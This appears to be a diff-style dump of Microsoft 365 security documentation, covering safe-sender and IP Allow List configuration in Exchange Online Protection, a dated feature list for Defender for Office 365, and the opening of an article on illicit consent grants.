- - **IP Allow List**: Specify the source IP address or address range in the connection filter policy. For instructions, see [Configure connection filtering](connection-filter-policies-configure.md).
-
- Use this setting if the sending domain doesn't use email authentication. Be as restrictive as possible when it comes to the source IP addresses in the IP Allow List. We recommend an IP address range of /24 or less (less is better). Don't use IP address ranges that belong to consumer services (for example, outlook.com) or shared infrastructures.
-
- > [!IMPORTANT]
- >
- > - Never configure mail flow rules with _only_ the sender domain as the condition to skip spam filtering. Doing so will _significantly_ increase the likelihood that attackers can spoof the sending domain (or impersonate the full email address), skip all spam filtering, and skip sender authentication checks so the message will arrive in the recipient's Inbox.
- >
- > - Do not use domains you own (also known as accepted domains) or popular domains (for example, microsoft.com) as conditions in mail flow rules. Doing so is considered high risk because it creates opportunities for attackers to send email that would otherwise be filtered.
- >
- > - If you allow an IP address that's behind a network address translation (NAT) gateway, you need to know the servers that are involved in the NAT pool in order to know the scope of your IP Allow List. IP addresses and NAT participants can change. You need to periodically check your IP Allow List entries as part of your standard maintenance procedures.
-
-3. **Optional conditions**:
- - **The sender** \> **is internal/external** \> **Outside the organization**: This condition is implicit, but it's OK to use it to account for on-premises email servers that might not be correctly configured.
- - **The subject or body** \> **subject or body includes any of these words** \> \<keywords\>: If you can further restrict the messages by keywords or phrases in the subject line or message body, you can use those words as a condition.
-
-4. **Action**: Configure both of the following actions in the rule:
- 1. **Modify the message properties** \> **set the spam confidence level (SCL)** \> **Bypass spam filtering**.
- 2. **Modify the message properties** \> **set a message header**:
- - **Header name**: For example, `X-ETR`.
- - **Header value**: For example, `Bypass spam filtering for authenticated sender 'contoso.com'`.
-
- If you've more than one domain in the rule, you can customize the header text as appropriate.
-
-When a message skips spam filtering due to a mail flow rule, the value `SFV:SKN` value is stamped in the **X-Forefront-Antispam-Report** header. If the message is from a source that's on the IP Allow List, the value `IPV:CAL` is also added. These values can help you with troubleshooting.
--
-## Use Outlook Safe Senders
-
-> [!CAUTION]
-> This method creates a high risk of attackers successfully delivering email to the Inbox that would otherwise be filtered; however, if a message from an entry in the user's Safe Senders or Safe Domains lists is determined to be malware or high confidence phishing, the message will be filtered.
-
-Instead of an organizational setting, users or admins can add the sender email addresses to the Safe Senders list in the mailbox. For instructions, see [Configure junk email settings on Exchange Online mailboxes in Office 365](configure-junk-email-settings-on-exo-mailboxes.md). Safe Senders list entries in the mailbox affect that mailbox only.
-
-This method isn't desirable in most situations since senders will bypass parts of the filtering stack. Although you trust the sender, the sender can still be compromised and send malicious content. You should let our filters check every message and then [report the false positive/negative to Microsoft](submissions-report-messages-files-to-microsoft.md) if we got it wrong. Bypassing the filtering stack also interferes with [zero-hour auto purge (ZAP)](zero-hour-auto-purge.md).
-
-When messages skip spam filtering due to entries in a user's Safe Senders list, the **X-Forefront-Antispam-Report** header field will contain the value `SFV:SFE`, which indicates that filtering for spam, spoof, and phishing (not high confidence phishing) was bypassed.
-
-**Notes**:
--- In Exchange Online, whether entries in the Safe Senders list work or don't work depends on the verdict and action in the policy that identified the message:
- - **Move messages to Junk Email folder**: Domain entries and sender email address entries are honored. Messages from those senders aren't moved to the Junk Email folder.
- - **Quarantine**: Domain entries aren't honored (messages from those senders are quarantined). Email address entries are honored (messages from those senders aren't quarantined) if either of the following statements are true:
- - The message isn't identified as malware or high confidence phishing (malware and high confidence phishing messages are quarantined).
- - The email address isn't also in a block entry in the [Tenant Allow/Block List](tenant-allow-block-list-email-spoof-configure.md#create-block-entries-for-domains-and-email-addresses).
-- Entries for blocked senders and blocked domains are honored (messages from those senders are moved to the Junk Email folder). Safe mailing list settings are ignored.-
-## Use the IP Allow List
-
-> [!CAUTION]
-> Without additional verification like mail flow rules, email from sources in the IP Allow List skips spam filtering and sender authentication (SPF, DKIM, DMARC) checks. This result creates a high risk of attackers successfully delivering email to the Inbox that would otherwise be filtered; however, if a message from an entry in the IP Allow List is determined to be malware or high confidence phishing, the message will be filtered.
-
-The next best option is to add the source email server or servers to the IP Allow List in the connection filter policy. For details, see [Configure connection filtering in EOP](connection-filter-policies-configure.md).
-
-**Notes**:
--- It's important that you keep the number of allowed IP addresses to a minimum, so avoid using entire IP address ranges whenever possible.-- Don't use IP address ranges that belong to consumer services (for example, outlook.com) or shared infrastructures.-- Regularly review the entries in the IP Allow List and remove the entries that you no longer need.-
-## Use allowed sender lists or allowed domain lists
-
-> [!CAUTION]
->
-> This method creates a high risk of attackers successfully delivering email to the Inbox that would otherwise be filtered; however, if a message from an entry in the allowed senders or allowed domains lists is determined to be malware or high confidence phishing, the message will be filtered.
->
-> Do not use popular domains (for example, microsoft.com) in allowed domain lists.
-
-The least desirable option is to use the allowed sender lists or allowed domain lists in anti-spam policies. You should avoid this option _if at all possible_ because senders bypass all spam, spoof, phishing protection (except high confidence phishing), and sender authentication (SPF, DKIM, DMARC). This method is best used for temporary testing only. The detailed steps can be found in [Configure anti-spam policies in EOP](anti-spam-policies-configure.md) topic.
-
-The maximum limit for these lists is approximately 1000 entries; although, you'll only be able to enter 30 entries into the portal. You must use PowerShell to add more than 30 entries.
-
-> [!NOTE]
-> As of September 2022, if an allowed sender, domain, or subdomain is in an [accepted domain](/exchange/mail-flow-best-practices/manage-accepted-domains/manage-accepted-domains) in your organization, that sender, domain, or subdomain must pass [email authentication](email-authentication-about.md) checks in order to skip anti-spam filtering.
-
-## Considerations for bulk email
-
-A standard SMTP email message consists of a _message envelope_ and message content. The message envelope contains information that's required for transmitting and delivering the message between SMTP servers. The message content contains message header fields (collectively called the _message header_) and the message body. The message envelope is described in RFC 5321, and the message header is described in RFC 5322. Recipients never see the actual message envelope because it's generated by the message transmission process, and it isn't actually part of the message.
--- The `5321.MailFrom` address (also known as the **MAIL FROM** address, P1 sender, or envelope sender) is the email address that's used in the SMTP transmission of the message. This email address is typically recorded in the **Return-Path** header field in the message header (although it's possible for the sender to designate a different **Return-Path** email address). If the message can't be delivered, it's the recipient for the non-delivery report (also known as an NDR or bounce message).-- The `5322.From` address (also known as the **From** address or P2 sender) is the email address in the **From** header field, and is the sender's email address that's displayed in email clients.-
-Frequently, the `5321.MailFrom` and `5322.From` addresses are the same (person-to-person communication). However, when email is sent on behalf of someone else, the addresses can be different. This happens most often for bulk email messages.
-
-For example, suppose that Blue Yonder Airlines has hired Margie's Travel to send advertising email messages. The message you receive in your Inbox has the following properties:
--- The `5321.MailFrom` address is blueyonder.airlines@margiestravel.com.-- The `5322.From` address is blueyonder@news.blueyonderairlines.com, which is what you see in Outlook.-
-Safe sender lists and safe domain lists in anti-spam policies in EOP inspect only the `5322.From` addresses. This behavior is similar to Outlook Safe Senders that use the `5322.From` address.
-
-To prevent this message from being filtered, you can take the following steps:
--- Add blueyonder@news.blueyonderairlines.com (the `5322.From` address) as an Outlook Safe Sender.-- [Use a mail flow rule](#use-mail-flow-rules) with a condition that looks for messages from blueyonder@news.blueyonderairlines.com (the `5322.From` address), blueyonder.airlines@margiestravel.com (the `5321.MailFrom` address), or both.
security Defender For Office 365 Whats New https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/defender-for-office-365-whats-new.md
- Title: What's new in Microsoft Defender for Office 365
-description: Learn about the new features and functionality available in the latest release of Microsoft Defender for Office 365.
-keywords: what's new in Microsoft Defender for Office 365, ga, generally available, capabilities, available, new
--- Previously updated : 4/3/2024-
- - m365-security
- - tier1
----
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 1 and Plan 2</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-defender" target="_blank">Microsoft Defender XDR</a>
--
-# What's new in Microsoft Defender for Office 365
--
-This article lists new features in the latest release of Microsoft Defender for Office 365. Features that are currently in preview are denoted with **(preview)**.
-
-Learn more by watching [this video](https://www.youtube.com/watch?v=Tdz6KfruDGo&list=PL3ZTgFEc7LystRja2GnDeUFqk44k7-KXf&index=3).
-
-To search the Microsoft 365 Roadmap for Defender for Office 365 features, use [this link](https://www.microsoft.com/microsoft-365/roadmap?filters=&searchterms=Microsoft%2CDefender%2Cfor%2COffice%2C365).
-
-For more information on what's new with other Microsoft Defender security products, see:
--- [What's new in Microsoft Defender XDR](../defender/whats-new.md)-- [What's new in Microsoft Defender for Endpoint](../defender-endpoint/whats-new-in-microsoft-defender-endpoint.md)-- [What's new in Microsoft Defender for Identity](/defender-for-identity/whats-new)-- [What's new in Microsoft Defender for Cloud Apps](/cloud-app-security/release-notes)-
-## April 2024
--- **Enhanced clarity in submissions results**: Admins and security operators now see enhanced results within submissions across email, Microsoft Teams messages, email attachments, URLs, and user-reported messages. These updates aim to eliminate any ambiguity associated with the current submission results. The results are refined to ensure clarity, consistency, and conciseness, making the submission results more actionable for you. [Learn more](submissions-admin.md).-
-## March 2024
--- **Copy simulation functionality in Attack simulation training**: Admins can now duplicate existing simulations and customize them to their specific requirements. This feature saves time and effort by using previously launched simulations as templates when creating new ones. [Learn more](attack-simulation-training-simulations.md#copy-simulations).-- Attack simulation training is now available in **Microsoft 365 DoD**. [Learn more](/office365/servicedescriptions/microsoft-defender-for-office-365-features#attack-simulation-training).-
-## February 2024
--- **Hunting and responding to QR code-based attacks**: Security teams are now able to see the URLs extracted from QR codes with **QR code** as URL source on the **URL** tab of the [Email entity page](mdo-email-entity-page.md), and **QRCode** in the **UrlLocation** column of **EmailUrlInfo** table in [Advanced Hunting](../defender/advanced-hunting-overview.md). You can also filter for email with URLs embedded within QR codes using the **URL Source** filter value **QR code** in the **All email**, **Malware**, and **Phish** views in [Threat Explorer (Explorer)](threat-explorer-real-time-detections-about.md).-
-## January 2024
--- **New training modules available in Attack Simulation Training**: Teach your users to recognize and protect themselves against QR code phishing attacks. For more information, see [this blog post](https://techcommunity.microsoft.com/t5/microsoft-defender-for-office/train-your-users-to-be-more-resilient-against-qr-code-phishing/ba-p/4022667).-- **Providing intent while submitting is now generally available**: Admins can identify if they're submitting an item to Microsoft for a second opinion or they're submitting the message because it's malicious and was missed by Microsoft. With this change, Microsoft analysis of admin submitted messages (email and Microsoft Teams), URLs, and email attachments is further streamlined and results in a more accurate analysis. [Learn more](submissions-admin.md).-
-## December 2023
--- **QR code related phishing protection within Exchange Online Protection and Microsoft Defender for Office 365**: New detection capabilities using image detection, threat signals, URL analysis now extracts QR codes from URLs and blocks QR code based phishing attacks from the body of an email. To learn more, see our [blog](https://techcommunity.microsoft.com/t5/microsoft-defender-for-office/protect-your-organizations-against-qr-code-phishing-with/ba-p/4007041).-- **Microsoft Defender XDR Unified RBAC is now generally available**: Defender XDR Unified RBAC supports all Defender for Office 365 scenarios that were previously controlled by [Email & collaboration permissions](mdo-portal-permissions.md) and [Exchange Online permissions](/exchange/permissions-exo/permissions-exo). To learn more about the supported workloads and data resources, see [Microsoft Defender XDR Unified role-based access control (RBAC)](/microsoft-365/security/defender/manage-rbac).-
- > [!TIP]
- > Defender XDR Unified RBAC isn't generally available in Microsoft 365 Government Community Cloud High (GCC High) or Department of Defense (DoD).
-
-## November 2023
--- **Enhanced Action experience from Email Entity/ Summary Panel**: As part of the change security admins can take multiple actions as part of FP/FN flows. [Learn more](mdo-email-entity-page.md).-- The [Tenant Allow/Block List](tenant-allow-block-list.md) supports more entries in each category (Domains & email addresses, Files, and URLs:
- - Microsoft Defender for Office 365 Plan 2 supports 10,000 block entries and 5,000 allow entries (via admin submissions) in each category.
- - Microsoft Defender for Office 365 Plan 1 supports 1,000 block entries and 1,000 allow entries (via admin submissions) in each category.
- - Exchange Online Protection remains at 500 block entries and 500 allow entries (via admin submissions) in each category.
-
-## October 2023
--- **Create and manage simulations using the Graph API** in Attack simulation training. [Learn more](/graph/api/attacksimulationroot-post-simulation)-- **Exchange Online permission management in Defender for Office 365 is now supported in Microsoft Defender XDR Unified role-based access control (RBAC)**: In addition to the existing support for [Email & collaboration permissions](mdo-portal-permissions.md), Defender XDR Unified RBAC now also supports protection-related [Exchange Online permissions](/exchange/permissions-exo/permissions-exo). To learn more about the supported Exchange Online permissions, see [Exchange Online permissions mapping](/microsoft-365/security/defender/compare-rbac-roles#exchange-online-permissions-mapping).-
-## September 2023
--- URL top-level domain blocking is available in the **Tenant allow block list**. [Learn more](tenant-allow-block-list-urls-configure.md).-- Attack simulation training is now available in **Microsoft 365 GCC High**. [Learn more](/office365/servicedescriptions/microsoft-defender-for-office-365-features#attack-simulation-training).-
-## August 2023
--- If the [User reported settings](submissions-user-reported-messages-custom-mailbox.md) in the organization send user reported messages (email and [Microsoft Teams](submissions-teams.md)) to Microsoft (exclusively or in addition to the reporting mailbox), we now do the same checks as when admins submit messages to Microsoft for analysis from the **Submissions** page.-- **Default intra-organizational protection**: By default, messages sent between internal users that are identified as high confidence phishing are quarantined. Admins change this setting in the default anti-spam policy or in custom policies (opt-out of intra-org protection or include other spam filtering verdicts). For configuration information, see [Configure anti-spam policies in EOP](anti-spam-policies-configure.md).-
-## July 2023
--- Use anti-phishing policies to control what happens to messages where the sender fails explicit [DMARC](email-authentication-dmarc-configure.md) checks and the DMARC policy is set to `p=quarantine` or `p=reject`. For more information, see [Spoof protection and sender DMARC policies](anti-phishing-policies-about.md#spoof-protection-and-sender-dmarc-policies).-- [User tags](user-tags-about.md) are now fully integrated with Defender for Office 365 reports, including:
- - [Threat protection status report](reports-email-security.md#threat-protection-status-report)
- - [Compromised users report](reports-email-security.md#compromised-users-report)
- - [Top senders and recipients report](reports-email-security.md#top-senders-and-recipients-report)
- - [URL protection report](reports-email-security.md#url-protection-report)
-
-## May 2023
--- Built-in reporting in Outlook on the web supports reporting messages from shared mailboxes or other mailboxes by a delegate.
- - Shared mailboxes require Send As or Send On Behalf permission for the user.
- - Other mailboxes require Send As or Send On Behalf permission _and_ Read and Manage permissions for the delegate.
-
-## April 2023
--- [Using machine learning to drive more effective simulations in Attack Simulation and Training](https://techcommunity.microsoft.com/t5/microsoft-defender-for-office/attack-simulation-training-using-machine-learning-to-drive-more/ba-p/3791023): Make use of intelligent predicted compromise rate (PCR) and Microsoft Defender for Office 365 payload recommendations for utilizing high-quality payloads in your simulation.-- [Training only campaigns available with an expanded library](https://techcommunity.microsoft.com/t5/microsoft-defender-for-office/training-only-campaign-is-now-available-with-an-expanded/ba-p/3795237): You can now directly assign training content to your organization without needing to tie training to a phishing simulation campaign. We have also expanded our training module library to more than 70 different modules.-
-## March 2023
--- **Collaboration security for Microsoft Teams**: With the increased use of collaboration tools like Microsoft Teams, the possibility of malicious attacks using URLs and messages has increased as well. Microsoft Defender for Office 365 is extending its [Safe Links](safe-links-about.md) protection with increased capabilities for zero-hour auto purge (ZAP), quarantine, and end user reporting of potential malicious messages to their admins. For more information, see [Microsoft Defender for Office 365 support for Microsoft Teams (Preview)](mdo-support-teams-about.md).-- **Built-in protection: Safe Links time of click protection enabled for email**: By default, Microsoft now protects URLs in email messages at time of click as part of this update to Safe Links settings (_EnableSafeLinksForEmail_) within the Built-in protection preset security policy. To learn about the specific Safe Links protections in the Built-in protection policy, see [Safe Links policy settings](recommended-settings-for-eop-and-office365.md#safe-links-policy-settings).-- **Quarantine notifications enabled in preset security policies**: If your organization has enabled or will enable the Standard or Strict preset security policies, the policies will be automatically updated to use the new DefaultFullAccessWithNotificationPolicy quarantine policy (notifications enabled) wherever the DefaultFullAccessPolicy (notifications disabled) was used. To learn more about quarantine notifications, see [Quarantine notifications](quarantine-quarantine-notifications.md). For more information about specific settings in preset security policies, see [Microsoft recommendations for EOP and Defender for Office 365 security settings](recommended-settings-for-eop-and-office365.md).-
-## January 2023
--- [Automatic Tenant Allow/Block List expiration management is now available in Microsoft Defender for Office 365](https://techcommunity.microsoft.com/t5/microsoft-defender-for-office/automatic-tenant-allow-block-list-expiration-management-is-now/ba-p/3723447): Microsoft now automatically removes allow entries from the Tenant Allow/Block List once the system has learned from it. Alternatively, Microsoft extends the expiration time of the allow entries if the system hasn't learned yet. This behavior prevents legitimate email from going to junk or quarantine.-- **Configuring third-party phishing simulations in Advanced Delivery:** We expanded "Simulation URLs to allow" limit to 30 URLs. To learn how to configure, see [Configure the delivery of third-party phishing simulations to users and unfiltered messages to SecOps mailboxes](advanced-delivery-policy-configure.md)-- [Enhanced user telemetry in the simulation reports in Attack Simulation Training](https://techcommunity.microsoft.com/t5/microsoft-defender-for-office/attack-simulation-training-new-insights-into-targeted-user/ba-p/3673105): As part of our enhanced user telemetry, administrators can now view additional details about how their targeted users are interacting with the phishing payload from phishing simulation campaigns.-
-## December 2022
--- The new Microsoft Defender XDR role-based access control (RBAC) model, with support for Microsoft Defender for Office, is now available in public preview. For more information, see [Microsoft Defender XDR role-based access control (RBAC)](../defender/manage-rbac.md).--- [Use the built-in Report button in Outlook on the web](submissions-outlook-report-messages.md#use-the-built-in-report-button-in-outlook-on-the-web): Use the built-in Report button in Outlook on the web to report messages as phish, junk, and not junk.-
-## October 2022
--- [Automated Investigations email cluster action deduplication](air-review-approve-pending-completed-actions.md): We have added additional checks. If the same investigation cluster is already approved during the past hour, new duplicate remediation isn't processed again.--- [Manage allows and blocks in the Tenant Allow/Block List](tenant-allow-block-list-about.md):
- - With **allow expiry management** (currently in Private Preview), if Microsoft hasn't learned from the allow, Microsoft automatically extends the expiry time of allows, which are going to expire soon, by 30 days to prevent legitimate email from going to junk or quarantine again.
- - Customers in government cloud environments are now able to create allow and block entries for URLs and attachments in the Tenant Allow/Block List using admin submissions for URLs and email attachments. The data submitted through the submissions experience doesn't leave the customer tenant, thus satisfying the data residency commitments for government cloud clients.
-- **Enhancement in URL click alerts:**
- - With the new lookback scenario, the "A potentially malicious URL click was detected" alert now includes any clicks during the _past 48 hours_ (for email) from the time the malicious URL verdict is identified.
-
-## September 2022
--- **Anti-spoofing enhancement for internal domains and senders:**
- - For spoofing protection, the allowed senders or domains defined in the [anti-spam policy](anti-spam-policies-configure.md) and within user allow lists must now pass authentication in order for the allowed messages to be honored. The change only affects messages that are considered to be internal (the sender or sender's domain is in an accepted domain in the organization). All other messages continue to be handled as they are today.
--- **Automatic redirection from Office action center to unified action center:** The action center in the Email & Collaboration section **Email & Collaboration** > **Review** > **Action center** (https://security.microsoft.com/threatincidents) is automatically redirected to **Actions & Submissions** > **Action center** > **History** (https://security.microsoft.com/action-center/history).--- **Automatic redirection from Office 365 Security & Compliance Center to Microsoft Defender portal:** Automatic redirection begins for users accessing the security solutions in Office 365 Security & Compliance center (protection.office.com) to the appropriate solutions in Microsoft Defender portal (security.microsoft.com). This change is for all security workflows like (for example, Alerts, Threat Management, and Reports).-
- - Redirection URLs:
- - GCC Environment:
- - From Office 365 Security & Compliance Center URL: protection.office.com
- - To Microsoft Defender XDR URL: security.microsoft.com
- - GCC-High Environment:
- - From Office 365 Security & Compliance Center URL: scc.office365.us
- - To Microsoft Defender XDR URL: security.microsoft.us
- - DoD Environment:
- - From Office 365 Security & Compliance Center URL: scc.protection.apps.mil
- - To Microsoft Defender XDR URL: security.apps.mil
-- Items in the Office 365 Security & Compliance Center that aren't related to security aren't redirected to Microsoft Defender XDR. For compliance solutions redirection to Microsoft 365 Compliance Center, see Message Center post 244886.-- This change is a continuation of [Microsoft Defender XDR delivers unified XDR experience to GCC, GCC High and DoD customers - Microsoft Tech Community](https://techcommunity.microsoft.com/t5/public-sector-blog/microsoft-365-defender-delivers-unified-xdr-experience-to-gcc/ba-p/3263702), announced in March 2022.-- This change enables users to view and manage additional Microsoft Defender XDR security solutions in one portal.-- This change impacts all customers who use the Office 365 Security & Compliance Center (protection.office.com), including Microsoft Defender for Office (Plan 1 or Plan 2), Microsoft 365 E3 / E5, Office 365 E3/ E5, and Exchange Online Protection. For the full list, see [Microsoft 365 guidance for security & compliance](/office365/servicedescriptions/microsoft-365-service-descriptions/microsoft-365-tenantlevel-services-licensing-guidance/microsoft-365-security-compliance-licensing-guidance)-- This change impacts all users who sign in to the Office 365 Security and Compliance portal (protection.office.com), including security teams and end-users who access the Email Quarantine experience, at the **Microsoft Defender Portal** \> **Review** \> **Quarantine**.-- Redirection is enabled by default and impacts all users of the Tenant.-- Global Administrators and Security Administrators can turn on or off redirection in the Microsoft Defender portal by navigating to **Settings** \> **Email & collaboration** > **Portal redirection** and switch the redirection toggle.-- **Built-in protection**: A profile that enables a base level of Safe Links and Safe Attachments protection that's on by default for all Defender for Office 365 customers. To learn more about this new policy and order of precedence, see [Preset security policies](preset-security-policies.md). To learn about the specific Safe Links and Safe Attachment controls that are set, see [Safe Attachments settings](recommended-settings-for-eop-and-office365.md#safe-attachments-settings) and [Safe Links policy settings](recommended-settings-for-eop-and-office365.md#safe-links-policy-settings).-- **Bulk Complaint Level** is now available in the EmailEvents table in Advanced Hunting with numeric BCL values from 0 to 9. A higher BCL score indicates that bulk message is more likely to generate complaints and is more likely to be spam.-
-## July 2022
--- [Introducing actions into the Email entity page](mdo-email-entity-page.md): Admins can take preventative, remediation, and submission actions from the Email entity page.-
-## June 2022
--- [Create allow entries for spoofed senders](tenant-allow-block-list-email-spoof-configure.md#create-allow-entries-for-spoofed-senders): Create allowed spoofed sender entries using the Tenant Allow/Block List.--- [Impersonation allows using admin submission](tenant-allow-block-list-email-spoof-configure.md#about-impersonated-domains-or-senders): Add allows for impersonated senders using the **Submissions** page in Microsoft Defender XDR.--- [Submit user reported messages to Microsoft for analysis](submissions-admin.md#submit-user-reported-messages-to-microsoft-for-analysis): Configure a reporting mailbox to intercept user-reported messages without sending the messages to Microsoft for analysis.--- View the associated alerts for [user reported messages](submissions-admin.md#actions-for-user-reported-messages-in-defender-for-office-365) and [admin submissions](submissions-admin.md#actions-for-admin-submissions-in-defender-for-office-365): View the corresponding alert for each user reported phishing message and admin email submission.--- [Configurable impersonation protection custom users and domains and increased scope within Preset policies](https://techcommunity.microsoft.com/t5/microsoft-defender-for-office/configurable-impersonation-protection-and-scope-for-preset/ba-p/3294459):
- - (Choose to) Apply Preset Strict/Standard policies to entire organization and avoid the hassle of selecting specific recipient users, groups, or domains, thereby securing all recipient users of your organization.
- - Configure impersonation protection settings for custom users and custom domains within Preset Strict/Standard policies and automatically protect your targeted users and targeted domain against impersonation attacks.
--- [Simplifying the quarantine experience (part two) in Microsoft Defender XDR for office 365](https://techcommunity.microsoft.com/t5/microsoft-defender-for-office/simplifying-the-quarantine-experience-part-two/ba-p/3354687): Highlights additional features to make the quarantine experience even easier to use.--- [Introducing differentiated protection for priority accounts in Microsoft Defender for Office 365](https://techcommunity.microsoft.com/t5/microsoft-defender-for-office/introducing-differentiated-protection-for-priority-accounts-in/ba-p/3283838): Introducing GCC, GCC-H, and DoD availability of differentiated protection for priority accounts.-
-## April 2022
--- [Introducing the URLClickEvents table in Microsoft Defender XDR Advanced Hunting](https://techcommunity.microsoft.com/t5/microsoft-defender-for-office/introducing-the-urlclickevents-table-in-advanced-hunting-with/ba-p/3295096): Introducing the UrlClickEvents table in advanced hunting with Microsoft Defender for Office 365.-- [Manual email remediation enhancements](remediate-malicious-email-delivered-office-365.md): Bringing manual email purge actions taken in Microsoft Defender for Office 365 to the Microsoft Defender XDR (M365D) unified Action Center using a new action-focused investigation.-- [Introducing differentiated protection for priority accounts in Microsoft Defender for Office 365](https://techcommunity.microsoft.com/t5/microsoft-defender-for-office/introducing-differentiated-protection-for-priority-accounts-in/ba-p/3283838): Introducing the general availability of differentiated protection for priority accounts.-
-## March 2022
--- [Streamlined the submission experience in Microsoft Defender for Office 365](https://techcommunity.microsoft.com/t5/microsoft-defender-for-office/streamlining-the-submissions-experience-in-microsoft-defender/ba-p/3152080): Introducing the new unified and streamlined submission process to make your experience simpler.-
-## January 2022
--- [Updated Hunting and Investigation Experiences for Microsoft Defender for Office 365](https://techcommunity.microsoft.com/t5/microsoft-defender-for-office/updated-hunting-and-investigation-experiences-for-microsoft/ba-p/3002015): Introducing the email summary panel for experiences in Defender for Office 365, along with experience updates for Threat Explorer and Real-time detections.-
-## October 2021
--- [Advanced Delivery DKIM enhancement](advanced-delivery-policy-configure.md): Added support for DKIM domain entry as part of third-party phishing simulation configuration.-- [Secure by Default](secure-by-default.md): Extended Secure by Default for Exchange mail flow rules (also known as transport rules).-
-## September 2021
--- [Improved reporting experience in Defender for Office 365](https://techcommunity.microsoft.com/t5/microsoft-defender-for-office/improving-the-reporting-experience-in-microsoft-defender-for/ba-p/2760898)-- [Quarantine policies](quarantine-policies.md): Admins can configure granular control for recipient access to quarantined messages and customize end-user spam notifications.
- - [Video of admin experience](https://youtu.be/vnar4HowfpY)
- - [Video of end-user experience](https://youtu.be/s-vozLO43rI)
- - Other new capabilities coming to the quarantine experience are described in this blog post: [Simplifying the Quarantine experience](https://techcommunity.microsoft.com/t5/microsoft-defender-for-office/simplifying-the-quarantine-experience/ba-p/2676388).
-- Portal redirection by default begins, redirecting users from Security & Compliance to Microsoft Defender XDR <https://security.microsoft.com>. For more on this, see: [Redirecting accounts from Office 365 Security & Compliance Center to Microsoft Defender XDR](/microsoft-365/security/defender/microsoft-365-security-mdo-redirection)-
-## August 2021
--- [Admin review for reported messages](submissions-admin-review-user-reported-messages.md): Admins can now send templated messages back to end users after they review reported messages. The templates can be customized for your organization and based on your admin's verdict as well.-- You can now add allow entries to the Tenant Allow/Block List if the blocked message was submitted as part of the admin submission process. Depending on the nature of the block, the submitted URL, file, and/or sender allow will be added to the Tenant Allow/Block List. In most cases, the allows are added to give the system some time and allow it naturally if warranted. In some cases, Microsoft manages the allow for you. For more information, see:
- - [Report good URLs to Microsoft](submissions-admin.md#report-good-urls-to-microsoft)
- - [Report good email attachments to Microsoft](submissions-admin.md#report-good-email-attachments-to-microsoft)
- - [Report good email to Microsoft](submissions-admin.md#report-good-email-to-microsoft)
-
-## July 2021
--- [Email analysis improvements in automated investigations](email-analysis-investigations.md)-- [Advanced Delivery](advanced-delivery-policy-configure.md): Introducing a new capability for configuring the delivery of third-party phishing simulations to users and unfiltered messages to security operation mailboxes.-- [Safe Links for Microsoft Teams](safe-links-about.md#safe-links-settings-for-microsoft-teams)-- New alert policies for the following scenarios: compromised mailboxes, Forms phishing, malicious mails delivered due to overrides and rounding out ZAP
- - Suspicious email forwarding activity
- - User restricted from sharing forms and collecting responses
- - Form blocked due to potential phishing attempt
- - Form flagged and confirmed as phishing
- - [New alert policies for ZAP](/purview/new-defender-alert-policies)
-- Microsoft Defender for Office 365 alerts is now integrated into Microsoft Defender XDR - [Microsoft Defender XDR Unified Alerts Queue and Unified Alerts Queue](../defender/investigate-alerts.md)-- [User Tags](user-tags-about.md) are now integrated into Microsoft Defender for Office 365 alerting experiences, including: the alerts queue and details in Office 365 Security & Compliance, and scoping custom alert policies to user tags to create targeted alert policies.
- - Tags are also available in the unified alerts queue in the Microsoft Defender portal (Microsoft Defender for Office 365 Plan 2)
-
-## June 2021
--- New first contact safety tip setting within anti-phishing policies. This safety tip is shown when recipients first receive an email from a sender or don't often receive email from a sender. For more information on this setting and how to configure it, see the following articles:
- - [First contact safety tip](anti-phishing-policies-about.md#first-contact-safety-tip)
- - [Configure anti-phishing policies in EOP](anti-phishing-policies-eop-configure.md)
- - [Configure anti-phishing policies in Microsoft Defender for Office 365](anti-phishing-policies-mdo-configure.md)
-
-## April/May 2021
--- [Email entity page](mdo-email-entity-page.md): A unified 360-degree view of an email with enriched information around threats, authentication and detections, detonation details, and a brand-new email preview experience.-- [Office 365 Management API](/office/office-365-management-api/office-365-management-activity-api-schema#email-message-events): Updates to EmailEvents (RecordType 28) to add delivery action, original and latest delivery locations, and updated detection details.-- [Threat Analytics for Defender for Office 365](/microsoft-365/security/defender/threat-analytics): View active threat actors, popular techniques and attack surfaces, along with extensive reporting from Microsoft researchers around ongoing campaigns.-
-## February/March 2021
--- Alert ID integration (search using Alert ID and Alert-Explorer navigation) in [hunting experiences](threat-explorer-real-time-detections-about.md)-- Increasing the limits for Export of records from 9990 to 200,000 in [hunting experiences](threat-explorer-real-time-detections-about.md)-- Extending the Explorer (and Real-time detections) data retention and search limit for trial tenants from 7 (previous limit) to 30 days in [hunting experiences](threat-explorer-real-time-detections-about.md)-- New hunting pivots called **Impersonated domain** and **Impersonated user** within Explorer and Real-time detections to search for impersonation attacks against protected users or domains. For more information, see [Phish view in Threat Explorer and Real-time detections](threat-explorer-real-time-detections-about.md#phish-view-in-threat-explorer-and-real-time-detections).-
-## Microsoft Defender for Office 365 Plan 1 and Plan 2
-
-Did you know that Microsoft Defender for Office 365 is available in two plans? [Learn more about what each plan includes](mdo-about.md#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet).
-
-## See also
--- [Microsoft 365 roadmap](https://www.microsoft.com/microsoft-365/roadmap)-- [Microsoft Defender for Office 365 Service Description](/office365/servicedescriptions/office-365-advanced-threat-protection-service-description)
security Detect And Remediate Illicit Consent Grants https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/detect-and-remediate-illicit-consent-grants.md
- Title: Detect and Remediate Illicit Consent Grants-- NOCSH------- tier2-- m365-security Previously updated : 6/14/2023
- - MET150
-description: Learn how to recognize and remediate the illicit consent grants attack in Microsoft 365.
-
- - seo-marvel-apr2020
- - has-azure-ad-ps-ref
- - azure-ad-ref-level-one-done
-
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 1 and Plan 2</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-defender" target="_blank">Microsoft Defender XDR</a>
--
-# Detect and Remediate Illicit Consent Grants
--
-**Summary** Learn how to recognize and remediate the illicit consent grants attack in Microsoft 365.
-
-## What is the illicit consent grant attack in Microsoft 365?
-
